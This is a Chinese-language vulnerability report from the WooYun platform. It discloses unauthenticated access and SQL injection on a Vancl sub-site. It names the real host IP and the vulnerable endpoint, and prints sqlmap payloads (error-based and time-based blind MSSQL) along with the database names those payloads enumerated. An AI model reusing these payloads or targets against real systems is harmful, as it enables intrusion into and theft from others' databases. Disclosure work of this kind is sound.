缺陷编号:WooYun-2015-0129544
漏洞标题:凡客某分站未授权访问导致SQL注入(敏感信息泄漏)
相关厂商:凡客诚品
漏洞作者:土{2}
提交时间:2015-07-26 22:44
公开时间:2015-07-31 22:46
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
2015-07-26: 细节已通知厂商并且等待厂商处理中
2015-07-26: 厂商已查看当前漏洞内容,细节仅向厂商公开
2015-07-31: 厂商已经主动忽略漏洞,细节向公众公开
RT
http://119.253.55.28/ui/注入地址:http://119.253.55.28/ui/mail/PhoneQuery/PhoneQuery.aspxJSON
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 |
Place: (custom) POST<br> Parameter: JSON #2*<br> Type: error-based<br> Title: Microsoft SQL Server/Sybase error-based - Parameter replace<br> Payload: {"formCodes":[{"orderId":"(CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+<br> CHAR(122)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (5096=5096) THEN CHAR(49) ELSE<br> CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(98)+CHAR(113))))"}]}Type: AND/OR time-based blind<br> Title: Microsoft SQL Server/Sybase time-based blind - Parameter replace (hea<br> vy queries)<br> Payload: {"formCodes":[{"orderId":"(SELECT (CASE WHEN (9289=9289) THEN (SELE<br> CT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS<br> sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 9289 END))"}]}<br> ---<br> [21:58:25] [INFO] the back-end DBMS is Microsoft SQL Server<br> web server operating system: Windows 2008 R2 or 7<br> web application technology: ASP.NET, Microsoft IIS 7.5<br> back-end DBMS: Microsoft SQL Server 2008<br> [21:58:25] [INFO] fetching database names<br> [21:58:25] [INFO] the SQL query used returns 12 entries<br> [21:58:25] [INFO] resumed: ACCOUNTING_VJIA<br> [21:58:25] [INFO] resumed: master<br> [21:58:25] [INFO] resumed: model<br> [21:58:25] [INFO] resumed: msdb<br> [21:58:25] [INFO] resumed: QQUnion<br> [21:58:25] [INFO] resumed: SCM_VJIA<br> [21:58:25] [INFO] resumed: tempdb<br> [21:58:25] [INFO] resumed: WMS_VBJH<br> [21:58:25] [INFO] resumed: WMS_VGZ<br> [21:58:25] [INFO] resumed: WMS_VJIA<br> [21:58:25] [INFO] resumed: WMS_VSH<br> [21:58:25] [INFO] resumed: WMS_VNB<br> available databases [12]:<br> [*] ACCOUNTING_VJIA<br> [*] master<br> [*] model<br> [*] msdb<br> [*] QQUnion<br> [*] SCM_VJIA<br> [*] tempdb<br> [*] WMS_VBJH<br> [*] WMS_VGZ<br> [*] WMS_VJIA<br> [*] WMS_VNB<br> [*] WMS_VSH |
库就不跑了还有一处敏感信息泄露http://119.253.55.28/ui/mail/MailSetting.aspx
都是未授权访问惹的祸
权限 过滤
危害等级:无影响厂商忽略
忽略时间:2015-07-3122:46
漏洞Rank:15 (WooYun评价)
暂无
这个用什么参数跑的啊?求指导,谢谢。
原文连接
的情况下转载,若非则不得使用我方内容。